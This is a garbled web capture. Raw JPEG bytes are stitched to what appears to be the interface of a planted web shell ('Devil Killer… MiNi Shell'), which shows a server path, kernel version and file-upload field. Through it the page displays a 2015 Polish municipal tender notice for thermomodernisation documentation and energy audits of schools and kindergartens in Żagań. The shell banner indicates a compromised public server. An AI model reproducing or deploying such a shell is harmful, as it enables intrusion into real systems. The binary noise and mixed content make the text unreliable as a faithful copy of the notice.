JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151211/339024-N-2015.html

<p class="kh_header"><b>Żagań: WYKONANIE DOKUMENTACJI TECHNICZNEJ TERMOMODERNIZACJI WRAZ Z AUDYTEM  ENEGETYCZNYM  OBIEKTÓW UŻYTECZNOŚCI PUBLICZNEJ : 
1.  ZESPÓŁ SZKÓŁ NR 1 W ŻAGANIU
2.  ZESPÓŁ SZKÓŁ NR 2 W ŻAGANIU
3.  MIEJSKIE PRZEDSZKOLE NR 2 W ŻAGANIU, 
4.  MIEJSKIE PRZEDSZKOLE NR 3 W ŻAGANIU, 
W KONTEKŚCIE UBIEGANIA SIĘ O DOFINANSOWANIE W RAMACH RPO LUBUSKIE 2020</b><br>
<b>Numer ogłoszenia: 339024 - 2015; data zamieszczenia: 11.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żagań o Statusie Miejskim , Plac Słowiański 17, 68-100 Żagań, woj. lubuskie, tel. 68 4771040, faks 68 4771017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE DOKUMENTACJI TECHNICZNEJ TERMOMODERNIZACJI WRAZ Z AUDYTEM  ENEGETYCZNYM  OBIEKTÓW UŻYTECZNOŚCI PUBLICZNEJ : 
1.  ZESPÓŁ SZKÓŁ NR 1 W ŻAGANIU
2.  ZESPÓŁ SZKÓŁ NR 2 W ŻAGANIU
3.  MIEJSKIE PRZEDSZKOLE NR 2 W ŻAGANIU, 
4.  MIEJSKIE PRZEDSZKOLE NR 3 W ŻAGANIU, 
W KONTEKŚCIE UBIEGANIA SIĘ O DOFINANSOWANIE W RAMACH RPO LUBUSKIE 2020.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia udzielany w 4 częściach 
 Część  1   Wykonanie dokumentacji technicznej  termomodernizacji wraz z audytem energetycznym obiektu  użyteczności publicznej  : Zespół Szkół nr 1 w Żaganiu, w kontekście ubiegania się o dofinansowanie w ramach RPO Lubuskie 2020;   

Część 2  Wykonanie dokumentacji technicznej  termomodernizacji wraz z audytem energetycznym obiektu  użyteczności publicznej :  Zespół Szkół nr 2 w Żaganiu,  w kontekście ubiegania się o dofinansowanie w ramach RPO Lubuskie 2020;

Część 3  Wykonanie dokumentacji technicznej  termomodernizacji wraz z audytem energetycznym obiektu  użyteczności publicznej :   Miejskie Przedszkole nr 2 w Żaganiu, w kontekście ubiegania się o dofinansowanie w ramach RPO Lubuskie 2020;  

Część 4   Wykonanie dokumentacji technicznej  termomodernizacji wraz z audytem energetycznym obiektu  użyteczności publicznej  Miejskie Przedszkole nr 3 w Żaganiu, w kontekście ubiegania się o dofinansowanie w ramach RPO Lubuskie 2020; 

3.1. Podstawowe dane techniczne dotyczące obiektów : 
Cześć 1 Zespół Szkół nr 1 przy ulicy Żarskiej 1 w Żaganiu :
            - kubatura - 24387,00 m3
- powierzchnia budynku netto - 4260,00 m2
- liczba kondygnacji - (2, częściowo 3)
- liczba lokali - 71
- ogrzewanie z ciepłowni miejskiej
- konstrukcja budynku - technologia  tzw.  wielka płyta W-70
- rok budowy - 1964
Część   2 Zespół Szkół nr 2 przy ul. Nocznickiego 18 w Żaganiu :
	- kubatura - 31200,00 m3
	- powierzchnia użytkowa netto - 10398 m3 
	- liczba kondygnacji - (zróżnicowanie, max. 5)
	- liczba lokali - 95 
	- kotłownia lokalna (gaz)
	- konstrukcja budynku - technologia tzw. wielka płyta W70
	- rok budowy 1974
Część 3 Miejskie Przedszkole nr 2 przy ul. X-Lecia 13 w Żaganiu:
	- kubatura - 4392,00m3
	- powierzchnia użytkowa netto - 1464,00 m2
	- liczba kondygnacji - 2
	- liczba lokali - 16
	- kotłownia lokalna (gaz)
	- konstrukcja budynku - murowana (bloczki z bet. komórkowego suporeks)
	- rok budowy - 1986. 
Część 4 Miejskie Przedszkole nr 3 przy ul. X-Lecia 24 w Żaganiu:
	- kubatura - 4635 m3
	- powierzchnia użytkowa netto - 1159 m2
	- liczba kondygnacji - 2
	- liczba lokali - 16
	- kotłownia lokalna (gaz )
	- konstrukcja budynku - murowana (bet. komórkowy suporeks)
	- rok budowy - 1984
Zamawiający nie dysponuje dokumentacją techniczną w/w obiektów. 

3.2. PRIORYTETY DOTYCZĄCE OPRACOWANIA AUDYTÓW W KONTEKŚCIE UZYSKANIA DOFINANSOWANIA W RAMACH PROJEKTU RPO - LUBUSKIE 2020 zostały zawarte  w załączniku  do SIWZ.   
KRYTERIA OCENY WNIOSKOW O DOFINANOSWANIE , które należy wziąć pod uwagę przy opracowaniu audytów i projektów termomodernizacji  zostały zawarte w załączniku  do SIWZ. 

3.3. Zakres  przewidywanych  zadań obejmuje:
Opracowanie projektów  termomodernizacji dla poszczególnych ww. obiektów stanowiących podstawę do uzyskania pozwolenia na budowę . Opracowanie projektowe obejmuje :
-   inwentaryzację budowlaną w zakresie niezbędnym do celów projektowych
-  wykonanie audytu energetycznego obiektu obejmującego  - termomodernizację bryły 
    budynku, regulację systemów ogrzewania i wentylacji oraz przygotowania ciepłej wody
    użytkowej,
- projekt budowlany wykonawczy docieplenia obiektu i regulacji centralnego ogrzewania 
   z  ewentualnym uwzględnieniem modernizacji istniejących węzłów ciepłowniczych,
- przedmiary,
- kosztorysy inwestorskie,
- plany BIOZ  (dokumentacja dotycząca bezpieczeństwa i ochrony zdrowia  ze względu 
   na  specyfikę obiektów budowlanych n, jeśli jest wymagana przepisami),
- opracowanie specyfikacji technicznej wykonania i odbioru robót  w poszczególnych
   branżach,
- uzgodnienia opracowanych przez inspektora Ochrony P.poż. i Inspektora BHP 
Projektant załączy oświadczenie, że wersja elektroniczna dokumentacji projektowej zawiera wszystkie elementy wersji tradycyjnej  i jest kompletna  z punktu widzenia celu, któremu ma służyć. 

3.4. Szczegółowy zakres prac obejmuje : 
1. Wykonanie inwentaryzacji  pn. Zakres rzeczowy  inwentaryzacji :  
    - opis techniczny z uwzględnieniem lokalizacji, rodzaju  i charakteru budynku, liczby   
       kondygnacji, jego wysokości i powierzchni,
    - opis materiałów budowlanych, z jakich wykonane zostały poszczególne elementy      
       budynku
    - rzut działki w skali 1:500 z naniesionym budynkiem wraz z e schodami, tarasami, 
      chodnikami,   śmietnikami, ogrodzeniem, podziemnymi i naziemnymi przyłączami i 
      sąsiednią zabudową
    - zwymiarowane rzuty wszystkich kondygnacji zarówno naziemnych , jak i podziemnych, z 
       zaznaczonymi instalacjami i urządzeniami sanitarnymi w skali 1:50 lub 1:100
    - rzut dachu w skali 1:50 lub 1:100 z naniesionymi elementami więźby, przewodami 
       kominowymi i wentylacjami oraz sposobem odwodnienia
    - przekroje przez wszystkie kondygnacje z zaznaczonymi charakterystycznymi 
      wysokościami charakterystycznych punktów (rzędnych posadzek, podestów klatek 
      schodowych, tarasów, dachu, kominów, gzymsów, studzienek, murków i poziomu terenu)
    - rysunki architektoniczno-budowlane elewacji z naniesieniem wszystkich jej elementów
    - dokumentacja fotograficzna w postaci zdjęć
 1a) wykonanie inwentaryzacji przyrodniczej ( w zakresie istnienia gniazd ptasich i miejsc 
       lęgowych ) : w przypadku stwierdzenia gniazd i miejsc lęgowych ptaków będących pod 
       ochroną uzyskanie zgody w formie decyzji odpowiedniej jednostki Ochrony Środowiska 
       na zniszczenie siedlisk i gniazd ptasich. 
2.  Wykonanie audytów  energetycznych obiektów pod względem :
    - ustalenia współczynników przenikania ciepła przegród budowlanych,
    - ustalenia sprawności systemów ogrzewania
    - opisaniu i wykonaniu pomiarów systemu wentylacji
    - wykonaniu charakterystyki energetycznej budynku
    - zbiorcze  zestawienie i ocena obecnego stanu istniejącego budynku 
    - charakterystyka źródeł ciepła systemu ogrzewania i wentylacji
    - charakterystyka systemu podgrzewania wody
    - określenie wskaźników  emisji zanieczyszczeń poszczególnych systemów budynku
    - ustaleniu opłaty za 1 GJ energii na ogrzewanie  (w dniu sporządzania audytu)
    - zaplanowanie optymalnego wariantu przedsięwzięcia termomodernizacji
    - opracowanie sposobów zmniejszenia zużycia energii
    - oszacowanie opłacalności każdej z metod i wskazanie najbardziej opłacalnej dla 
      danego obiektu.
3. Opracowanie projektu termomodernizacji obiektów w zakresie wynikającym z audytu
    energetycznego w tym  opracowanie projektów branżowych wg potrzeb.
    Opracowanie przedmiarów robót  i kosztorysów inwestorskich. Przedmiary robót i
    kosztorysy inwestorskie muszą zawierać zestawienia przewidywanych do wykonania robót 
    podstawowych w kolejności technologicznej ich wykonania wraz z ich szczególnym 
    opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazaniem 
    właściwych specyfikacji technicznych wykonania i odbioru robót z wyliczeniem i
    zestawieniem ilości jednostek przedmiarowych robót podstawowych, wraz z podaniem 
    założeń wyjściowych do kosztorysowania robót.
4. Opracowanie Specyfikacji technicznej wykonania i odbioru robót budowlanych. 
    Specyfikacja musi dotyczyć konkretnych robót przewidzianych w projekcie oraz zawierać 
    zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, 
    w zakresie wykonania robót budowlanych, właściwości wyrobów budowlanych  oraz oceny 
    prawidłowości wykonania poszczególnych robót.

3.5. Dokumentacja projektowa powinna zawierać ( dla każdego z obiektów)  :
- kompleksowy audyt energetyczny  (w 3egz.)
- projekt budowlany wykonawczy termomodernizacji (z inwentaryzacją) z załączonym
  planem BIOZ  (należy  opracować i przekazać Zamawiającemu  w 5 egz.)
- specyfikacja techniczna wykonania i odbioru robót (w 3 egz.)
- kosztorysy inwestorskie (w 3 egz.)
- przedmiary robót (w 3 egz.)
- oraz wszystkie potrzebne uzgodnienia branżowe, decyzje, pozwolenia, włącznie z 
   uzyskaniem pozwolenia na prowadzenie robót budowlanych od Lubuskiego 
   Wojewódzkiego Konserwatora Zabytków.  

Kompletną dokumentację projektową należy wykonać i dostarczyć Zamawiającemu również na nośniku elektronicznym CD w formacie PDF w 2egz. wraz z kosztorysami inwestorskimi i przedmiarami robót w formacie ath.

Wykonawca zobowiązuje się wykonać dokumentacje projektową  zgodnie  z:
1) Ustawa z dnia 7 lipca 1994 r- Prawo budowlane (tj. Dz.U. z 2013 r poz 1409 z późn. z 
     zm.);
2) Rozporządzeniem Ministra Infrastruktury z dnia 25 kwietnia  2012  roku w sprawie 
    szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2012 r. poz. 462 ze
    zmianami);
3) Rozporządzeniem Ministra Infrastruktury z dnia z dnia 18 maja 2004 r. w sprawie 
    określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania 
    planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych 
    określonych w programie funkcjonalno-użytkowym (Dz.U. z dnia 8 czerwca 2004 roku Nr 
    130 poz.1389 ze zm);
4) Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie    
    szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych
    wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 
    z dnia 16 września 2004 roku Nr 202 poz.2072 ze zm);
5) Rozporządzeniu Ministra Infrastruktury z dnia 17 marca 2009 r., w sprawie szczegółowego 
    zakresu i form audytu energetycznego oraz części audytu remontowego, wzorów kart 
    audytów, a także algorytmu oceny opłacalności przedsięwzięcia termomodernizacyjnego 
    (Dz. U. z 2009 r. Nr 43, poz. 346 z późn. zm.).

3.6. Wykonawca składając ofertę na daną część zamówienia jest zobowiązany wyodrębnić koszt wykonania audytu energetycznego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.20.00-6, 71.24.50.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.03.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania  określonej 
     działalności lub czynności, Zamawiający nie stawia żadnych szczególnych  wymagań,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>)  w zakresie posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten  
     wymóg tego Wykonawcę,  który w okresie ostatnich trzech  lat przed upływem składania 
     ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie,  wykonał  co   
     najmniej : 
      - 2 projekty termomodernizacji budynku , w tym:  co najmniej jeden projekt polegający na 
       termomodernizacji budynku użyteczności publicznej
      - co najmniej dwa audyty energetyczne w budynkach  użyteczności publicznej.  
     Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.     
     Na potwierdzenie spełnienia tego  warunku Wykonawca złoży wraz z  ofertą wykaz  
     wykonanych głównych  usług, a w przypadku świadczeń okresowych lub ciągłych 
     również wykonywanych,   w okresie ostatnich trzech lat przed upływem składania  
     ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie,  wraz z  
     podaniem ich wartości, przedmiotu, dat  wykonania i podmiotów, na rzecz których usługi 
     zostały wykonane, oraz załączeniem dowodów, czy usługi  ujęte w wykazie usług 
     głównych zostały wykonane należycie, czy też  zostały  wykonane nienależycie.       
     Za główną usługę Zamawiający uznaje sporządzanie projektów termomodernizacji
     budynków użyteczności publicznej,  sporządzenie audytów energetycznych w  budynkach  
     użyteczności publicznej.  
     Dowodami  są poświadczenia wystawione przez  podmiot, na rzecz którego Wykonawca 
     świadczył usługę z tym, że  poświadczenie  w odniesieniu do nadal wykonywanych 
     usług okresowych lub ciągłych powinno być wydane nie wcześniej niż na 3 miesiące 
     przed upływem terminu składania ofert.   
     W przypadku gdy Zamawiający jest podmiotem na rzecz którego usługi  wskazane w 
     wykazie, zostały wcześniej wykonane, a w stosunku do których Zamawiający żąda 
     poświadczeń,  Wykonawca nie ma obowiązku przedkładania  dowodów- poświadczeń. 
     Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od 
     charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji 
     obowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi  zasobami  w 
     trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu  pisemne 
     zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych 
     zasobów na potrzeby  wykonania zamówienia. 
     Podmiot, który zobowiązał się do udostepnienia zasobów odpowiada solidarnie z 
     wykonawcą za szkodę  zamawiającego powstałą wskutek nieudostępnienia tych 
     zasobów, chyba że za nieudostępnienie zasobów nie ponosi  winy;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3) w zakresie dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi 
     do   wykonania zamówienia,  Zamawiający uzna za spełniającego te wymogi  tego 
     Wykonawcę, który  będzie dysponował  osobami  posiadającymi uprawnienia do 
     projektowania w specjalności :  
     - architektonicznej bez ograniczeń lub konstrukcyjno-budowlanej bez ograniczeń,
     - w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, 
       wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, 
     - w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i 
       teletechnicznych, 
       oraz będzie dysponował osobą  z licencją audytora energetycznego. 
    Wykonawcy występujący  wspólnie  powyższy warunek mogą spełnić łącznie.  
    Na potwierdzenie spełnienia w/w warunków Wykonawca złoży wykaz potencjału 
    osobowego dostępnego Wykonawcy  w celu wykonania zamówienia  wraz z informacją o 
    podstawie dysponowania  tymi zasobami. 
    W  tym zakresie  Wykonawca może polegać na  zasobach innych  podmiotów, niezależnie 
    od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji 
    zobowiązany jest  udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w 
    trakcie  realizacji zamówienia, w  szczególności przedstawiając w tym celu pisemne 
    zobowiązanie tych podmiotów do oddania mu do dyspozycji  niezbędnych zasobów 
    na potrzeby wykonania zamówienia. Podmiot, który zobowiązał się do udostępnienia 
    zasobów odpowiada solidarnie  z wykonawcą za szkodę zamawiającego powstałą 
    wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie 
    ponosi winy;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4) w zakresie sytuacji ekonomicznej i finansowej,  Zamawiający nie stawia żadnych 
     szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Za główną usługę Zamawiający uznaje sporządzanie projektów termomodernizacji
     budynków użyteczności publicznej,  sporządzenie audytów energetycznych w  budynkach  
     użyteczności publicznej.  
     Dowodami  są poświadczenia wystawione przez  podmiot, na rzecz którego Wykonawca 
     świadczył usługę z tym, że  poświadczenie  w odniesieniu do nadal wykonywanych 
     usług okresowych lub ciągłych powinno być wydane nie wcześniej niż na 3 miesiące 
     przed upływem terminu składania ofert.   
     W przypadku gdy Zamawiający jest podmiotem na rzecz którego usługi  wskazane w 
     wykazie, zostały wcześniej wykonane, a w stosunku do których Zamawiający żąda 
     poświadczeń,  Wykonawca nie ma obowiązku przedkładania  dowodów- poświadczeń.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
